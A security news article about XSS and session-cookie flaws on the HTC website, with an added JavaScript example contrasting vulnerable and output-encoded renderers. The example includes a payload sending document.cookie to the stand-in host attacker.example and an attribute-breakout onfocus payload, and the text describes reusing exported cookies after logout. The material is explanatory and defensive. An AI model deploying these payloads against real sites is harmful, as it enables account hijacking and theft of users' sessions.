Thamatam Deepak (Mr.47™) has reported a cross-site scripting (XSS) vulnerability and a cookie handling flaw in the HTC website that together allow an attacker to hijack HTC accounts. Mr. Deepak is a 16-year-old whitehat hacker who was listed in the Apple Hall of Fame this month alongside 'The Hacker News' researcher Mohit Kumar.
Cross-site scripting attacks are a type of injection problem, in which malicious scripts are injected into otherwise benign and trusted web sites. Because the injected script runs in the origin of the trusted site, it can read any cookies, session tokens or other sensitive information the browser holds for that site that are not marked HttpOnly. Attackers can therefore use this vulnerability to bypass access controls such as the same-origin policy.
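To make the injection concrete, here is an added example (not code from the HTC site, whose templates were not published) of a reflected XSS sink beside its output-encoded fix. The search page, the query payloads and the collector host name attacker.example are constructed for illustration; the second payload shows that an attribute context can be abused without any script tag at all.

```javascript
// Added example, not code from the HTC site: a reflected XSS sink beside its
// output-encoded fix. The search page, the payloads and the collector host
// (attacker.example) are constructed for illustration.
'use strict';

// Encode the five characters that can change meaning in HTML text nodes and
// double-quoted attribute values.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// Vulnerable: the query parameter is concatenated into the page unchanged,
// so a query containing markup becomes part of the document.
function renderResultsVulnerable(query) {
  return `<p>Results for: ${query}</p>`;
}
function renderSearchBoxVulnerable(query) {
  return `<input name="q" value="${query}">`;
}

// Fixed: every untrusted value is encoded for the context it lands in.
function renderResultsFixed(query) {
  return `<p>Results for: ${escapeHtml(query)}</p>`;
}
function renderSearchBoxFixed(query) {
  return `<input name="q" value="${escapeHtml(query)}">`;
}

// Does the markup contain a script element the template did not put there?
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// Constructed payloads. The first sends document.cookie to a collector the
// attacker controls; the second breaks out of a quoted attribute and runs an
// event handler without any <script> tag.
const SCRIPT_PAYLOAD =
  '<script>new Image().src="https://attacker.example/?c="+document.cookie</script>';
const ATTR_PAYLOAD = '" autofocus onfocus="alert(document.cookie)';

console.log(renderResultsVulnerable(SCRIPT_PAYLOAD));
console.log(renderResultsFixed(SCRIPT_PAYLOAD));
console.log(renderSearchBoxVulnerable(ATTR_PAYLOAD));
console.log(renderSearchBoxFixed(ATTR_PAYLOAD));
```

The fixed renderers produce pages in which the payloads are displayed as text; in the vulnerable ones the browser parses them as a script element or as an injected `onfocus` handler. Encoding alone does not stop a script that is already running from reading cookies, which is why session cookies should also carry the HttpOnly attribute.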
Cross-site scripting is a very common web application vulnerability; yesterday our security researcher Christy Philip Mathew reported multiple XSS flaws in the latest official versions of cPanel and WHM.
As reported by Deepak, there are multiple XSS flaws in the HTC website that allow an attacker to inject malicious scripts. A second vulnerability, in cookie handling, makes it easy for an attacker to hijack the accounts of HTC users.
Some sample vulnerable links are shown below:
At the time of writing, the vendor has fixed these flaws following the hacker's report; before the fix, the payloads executed in Google Chrome. More interesting still, one of the XSS flaws was on HTC's Product Security page itself, where HTC says: "At HTC, we recognize how important it is to protect your privacy and security. We understand that secure products are essential in maintaining the trust you place in us to provide products and services to you."
For the proof of concept, we created an account on the HTC website, exported its cookies to a text file and logged out. On another system we imported the cookies from that same file, opened the HTC website and found ourselves logged in again without entering the password. In other words, logging out does not invalidate the session on the server: the same cookies can be reused for authentication again and again until their expiry date, and the cross-site scripting vulnerability lets an attacker steal those cookies remotely with a little social engineering.
A similar cookie handling vulnerability was reported last month by 'The Hacker News' security researchers Christy Philip Mathew and Mohit Kumar in Hotmail and Outlook, with proofs of concept.